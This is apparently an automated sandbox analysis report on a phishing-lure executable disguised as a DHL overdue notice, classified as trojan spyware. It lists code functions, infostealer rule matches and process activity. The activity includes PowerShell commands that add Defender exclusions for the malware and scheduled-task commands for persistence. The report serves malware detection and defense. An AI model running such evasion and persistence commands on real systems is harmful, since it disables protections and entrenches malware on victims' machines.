                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734F1481_2_0734F148
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073400061_2_07340006
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073400401_2_07340040
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734D8A81_2_0734D8A8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_0734BC881_2_0734BC88
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E77281_2_073E7728
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073EB6F01_2_073EB6F0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E35601_2_073E3560
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E4C081_2_073E4C08
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E2CF01_2_073E2CF0
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E4BF81_2_073E4BF8
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E31281_2_073E3128
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_073E50401_2_073E5040
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_078FC5501_2_078FC550
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_078FE6F01_2_078FE6F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0131A3D89_2_0131A3D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0131D6589_2_0131D658
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_013198109_2_01319810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01314AD09_2_01314AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01313EB89_2_01313EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_013142009_2_01314200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0652B5A09_2_0652B5A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06529F6C9_2_06529F6C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06530E609_2_06530E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06539F809_2_06539F80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_065343F89_2_065343F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_065333989_2_06533398
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06535B809_2_06535B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_065390389_2_06539038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0653C1A09_2_0653C1A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_065354A09_2_065354A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06533AF09_2_06533AF0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_025C1CC413_2_025C1CC4
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_025C01A013_2_025C01A0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_025C0B5013_2_025C0B50
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_025C0B6013_2_025C0B60
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_025C2B1113_2_025C2B11
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_0260180813_2_02601808
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_026017F813_2_026017F8
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_04D3C55013_2_04D3C550
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_04D3E6F013_2_04D3E6F0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DB7A2013_2_06DB7A20
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DB9BC013_2_06DB9BC0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBC90013_2_06DBC900
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBBED013_2_06DBBED0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBAA6013_2_06DBAA60
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBBC8813_2_06DBBC88
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBD8A813_2_06DBD8A8
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DB004013_2_06DB0040
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DB000713_2_06DB0007
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DBF14813_2_06DBF148
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B910B13_2_084B910B
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B504013_2_084B5040
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084BA95813_2_084BA958
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B312813_2_084B3128
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B4BF813_2_084B4BF8
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B83B813_2_084B83B8
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B4C0813_2_084B4C08
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B2CF013_2_084B2CF0
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_084B356013_2_084B3560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_051ED65020_2_051ED650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_051EA3D020_2_051EA3D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_051E3EB820_2_051E3EB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_051E4AD020_2_051E4AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_051E420020_2_051E4200
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063AB5A020_2_063AB5A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063A9D5420_2_063A9D54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B9F8020_2_063B9F80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B5B8020_2_063B5B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B43F820_2_063B43F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B902B20_2_063B902B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B004020_2_063B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063BE19020_2_063BE190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063BC46020_2_063BC460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B54A020_2_063B54A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B3ADB20_2_063B3ADB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 20_2_063B339820_2_063B3398
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 1400
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2361303192.0000000007350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353195129.0000000002B02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000000.2238446670.00000000006D0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoZr.exe. vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2358846503.0000000006F95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename9e4810db-acaa-47dc-a281-6153255fd520.exe4 vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, 00000001.00000002.2352092660.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeBinary or memory string: OriginalFilenameoZr.exe. vs DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.46a9af0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: LJAGvecDW.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, v9Lsz.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, VFo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, 5FJ0H20tobu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, NtdoTGO.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, XBsYgp.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.466ead0.2.raw.unpack, AwxUa2Na.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, Y5gZfkJXWveVrlnV3i.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pG8amSqlnJ4quD2sgH.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pG8amSqlnJ4quD2sgH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pG8amSqlnJ4quD2sgH.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.2ad68cc.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7220000.7.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.2ac652c.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/28@1/1
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: C:\Users\user\AppData\Roaming\LJAGvecDW.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2744
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5616:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6532
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: C:\Users\user\AppData\Local\Temp\tmp87CB.tmpJump to behavior
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeVirustotal: Detection: 51%
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeReversingLabs: Detection: 44%
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile read: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 1400
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\LJAGvecDW.exe C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1760
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp"
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: srvcli.dllJump to behavior
